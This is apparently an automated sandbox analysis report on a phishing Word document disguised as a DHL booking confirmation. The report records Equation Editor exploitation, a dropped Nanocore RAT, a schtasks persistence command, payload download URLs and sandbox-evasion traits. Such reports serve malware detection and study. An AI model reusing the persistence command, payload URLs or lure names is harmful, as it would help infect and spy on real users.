Source: 9.0.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 10.0.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 10.2.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.2.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.69577.exe.3e0000.0.unpack, Login.cs	.Net Code: set_Name System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\Public\69577.exe	Code function: 4_2_001E9B10 push esp; ret
Source: C:\Users\Public\69577.exe	Code function: 4_2_004F0F78 push FFFFFFA2h; iretd
Source: C:\Users\Public\69577.exe	Code function: 4_2_004F0475 push FFFFFFADh; iretd
Source: C:\Users\Public\69577.exe	Code function: 4_2_004F11DD push ds; ret

Source: initial sample

Static PE information: section name: .text entropy: 7.94577186354

Persistence and Installation Behavior:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\69577.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\HOMqO[1].txt	Jump to dropped file
Source: C:\Users\Public\69577.exe	File created: C:\Users\user\AppData\Roaming\xWdTBYiTWyTud.exe	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\69577.exe

Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\HOMqO[1].txt

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\69577.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\xWdTBYiTWyTud' /XML 'C:\Users\user\AppData\Local\Temp\tmpA738.tmp'

Hooking and other Techniques for Hiding and Protection:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Source: C:\Users\Public\69577.exe

Thread delayed: delay time: 922337203685477

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2308	Thread sleep time: -480000s >= -30000s
Source: C:\Users\Public\69577.exe TID: 2828	Thread sleep time: -60000s >= -30000s
Source: C:\Users\Public\69577.exe TID: 2768	Thread sleep time: -922337203685477s >= -30000s

Source: 69577.exe, 00000004.00000002.2116170583.000000000083C000.00000004.00000020.sdmp	Binary or memory string: VMware_S
Source: 69577.exe, 00000004.00000002.2116204489.00000000008A9000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Users\Public\69577.exe

Process information queried: ProcessInformation

Anti Debugging:

Source: C:\Users\Public\69577.exe

Process token adjusted: Debug

Source: C:\Users\Public\69577.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
Source: C:\Users\Public\69577.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\xWdTBYiTWyTud' /XML 'C:\Users\user\AppData\Local\Temp\tmpA738.tmp'
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe {path}
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe {path}
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe {path}
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe {path}
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe {path}

Language, Device and Operating System Detection:

Source: C:\Users\Public\69577.exe

Queries volume information: C:\Users\Public\69577.exe VolumeInformation

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2320, type: MEMORY
Source: Yara match	File source: 4.2.69577.exe.34b88f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.34b88f0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.33a0240.3.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: 69577.exe, 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp

String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2320, type: MEMORY
Source: Yara match	File source: 4.2.69577.exe.34b88f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.34b88f0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.33a0240.3.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Spearphishing Link1	Command and Scripting Interpreter1	Scheduled Task/Job1	Process Injection11	Masquerading121	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job1	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Virtualization/Sandbox Evasion2	LSASS Memory	Security Software Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Remote Access Software1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution13	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection11	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information2	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol13	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing12	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery12	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc	28%	ReversingLabs	Document-Office.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Roaming\xWdTBYiTWyTud.exe	100%	Joe Sandbox ML
C:\Users\Public\69577.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\HOMqO[1].txt	100%	Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bit.ly	67.199.248.11	true	false	high
teknik.io	5.79.72.163	true	false	high
u.teknik.io	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://bit.ly/3kijui1	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://u.teknik.io/HOMqO.txt	3kijui1[1].htm.2.dr	false		high
http://www.%s.comPA	69577.exe, 00000004.00000002.2120004979.00000000056C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	69577.exe, 00000004.00000002.2120004979.00000000056C0000.00000002.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	69577.exe, 00000004.00000002.2116349948.0000000002251000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
67.199.248.11	unknown	United States		396982	GOOGLE-PRIVATE-CLOUDUS	false
5.79.72.163	unknown	Netherlands		60781	LEASEWEB-NL-AMS-01NetherlandsNL	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	357311
Start date:	24.02.2021
Start time:	12:52:37
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 17m 4s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@16/20@2/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 1.6% (good quality ratio 1.3%) Quality average: 71.2% Quality standard deviation: 36.9%
HCA Information:	Successful, ratio: 77% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Max analysis timeout: 720s exceeded, the analysis took too long TCP Packets have been reduced to 100 Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Excluded IPs from analysis (whitelisted): 192.35.177.64, 23.0.174.185, 23.0.174.187, 8.253.207.121, 8.241.80.126, 8.248.131.254, 8.252.5.126, 8.250.157.254 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, auto.au.download.windowsupdate.com.c.footprint.net, apps.identrust.com, au-bg-shim.trafficmanager.net Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:53:35	API Interceptor	49x Sleep call for process: EQNEDT32.EXE modified
12:53:38	API Interceptor	122x Sleep call for process: 69577.exe modified
12:53:52	API Interceptor	1x Sleep call for process: schtasks.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
67.199.248.11	QUOTE.doc	Get hash	malicious	Browse	bit.ly/2P3CMwd
	IMG_61061_SCANNED.doc	Get hash	malicious	Browse	bit.ly/2ZElo32
	SWIFT Payment W0301.doc	Get hash	malicious	Browse	bit.ly/3dyLFYN
	Quotation408S_A02021_AHYAN_group_of_companies.doc	Get hash	malicious	Browse	bit.ly/2OMPBuy
	YOUR PRODUCT.doc	Get hash	malicious	Browse	bit.ly/2LVhrUo
	Invoice.doc	Get hash	malicious	Browse	bit.ly/3amsMGn
	Purchase order.doc	Get hash	malicious	Browse	bit.ly/3qm8NNO
	IMG_04779.doc	Get hash	malicious	Browse	bit.ly/3dffBt0
	INV00004423.doc	Get hash	malicious	Browse	bit.ly/3aLXmrV
	PO_Scanned_06387.doc	Get hash	malicious	Browse	bit.ly/3rwUfef
	IMG_Scanned_3062.doc	Get hash	malicious	Browse	bit.ly/2YXPr5o
	INV00004423.doc	Get hash	malicious	Browse	bit.ly/2MvEzt1
	DTBT760087673.doc	Get hash	malicious	Browse	bit.ly/3arM6Rr
	IMG_59733.doc	Get hash	malicious	Browse	bit.ly/3rf1U0L
	IMG_804941.doc	Get hash	malicious	Browse	bit.ly/3cyMT5V
	IMG_0916.doc	Get hash	malicious	Browse	bit.ly/3pFy7y3
	SOA 2.doc	Get hash	malicious	Browse	bit.ly/3cxhzEz
	Quotation Ref FP-299318.doc	Get hash	malicious	Browse	bit.ly/3anMC2V
	PO 9174-AR.doc	Get hash	malicious	Browse	bit.ly/2LcGNNi
	sample new order.doc	Get hash	malicious	Browse	bit.ly/2MIhFy8

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
bit.ly	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	PO AAN2102002-V020.doc	Get hash	malicious	Browse	67.199.248.11
	PO55004.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	RFQ Document.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse	67.199.248.10
	Order.doc	Get hash	malicious	Browse	67.199.248.10
	QUOTE.doc	Get hash	malicious	Browse	67.199.248.11
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_57109_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	Deadly Variants of Covid 19.doc	Get hash	malicious	Browse	67.199.248.10
	swift payment.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_61061_SCANNED.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_6078_SCANNED.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_01670_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_7742_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	SWIFT Payment W0301.doc	Get hash	malicious	Browse	67.199.248.11
	_a6590.docx	Get hash	malicious	Browse	67.199.248.11
	Statement-ID28865611496334.vbs	Get hash	malicious	Browse	67.199.248.10
	Statement-ID21488878391791.vbs	Get hash	malicious	Browse	67.199.248.11

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LEASEWEB-NL-AMS-01NetherlandsNL	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	5.79.72.163
	PO AAN2102002-V020.doc	Get hash	malicious	Browse	5.79.72.163
	PO55004.doc	Get hash	malicious	Browse	5.79.72.163
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	5.79.72.163
	RFQ Document.doc	Get hash	malicious	Browse	5.79.72.163
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse	5.79.72.163
	SecuriteInfo.com.Trojan.PackedNET.540.1271.exe	Get hash	malicious	Browse	213.227.154.188
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	5.79.72.163
	MV9tCJw8Xr.exe	Get hash	malicious	Browse	5.79.70.250
	QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCK.doc	Get hash	malicious	Browse	5.79.72.163
	Quotation408S_A02021_AHYAN_group_of_companies.doc	Get hash	malicious	Browse	5.79.72.163
	Request For Quotation.PDF.exe	Get hash	malicious	Browse	212.32.237.101
	PO#652.exe	Get hash	malicious	Browse	5.79.87.207
	Parcel _009887 .exe	Get hash	malicious	Browse	212.32.237.92
	PO 20211602.xlsm	Get hash	malicious	Browse	82.192.82.225
	6d0000.exe	Get hash	malicious	Browse	213.227.133.129
	SecuriteInfo.com.Trojan.PackedNET.541.9005.exe	Get hash	malicious	Browse	62.212.86.139
	New Order 83329 PDF.exe	Get hash	malicious	Browse	95.211.208.58
	YTDSetup.exe	Get hash	malicious	Browse	82.192.80.226
	g3hMtp06fF.dll	Get hash	malicious	Browse	77.81.247.140
GOOGLE-PRIVATE-CLOUDUS	Offerte aanvragen 22-02-2021.ppt	Get hash	malicious	Browse	67.199.248.16
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	PO AAN2102002-V020.doc	Get hash	malicious	Browse	67.199.248.10
	PO55004.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	RFQ Document.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse	67.199.248.10
	Order.doc	Get hash	malicious	Browse	67.199.248.10
	QUOTE.doc	Get hash	malicious	Browse	67.199.248.11
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_57109_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	Deadly Variants of Covid 19.doc	Get hash	malicious	Browse	67.199.248.10
	swift payment.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_61061_SCANNED.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_6078_SCANNED.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_01670_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_7742_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	SWIFT Payment W0301.doc	Get hash	malicious	Browse	67.199.248.11
	_a6590.docx	Get hash	malicious	Browse	67.199.248.11
	Statement-ID28865611496334.vbs	Get hash	malicious	Browse	67.199.248.10

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Reputation:	moderate, very likely benign file
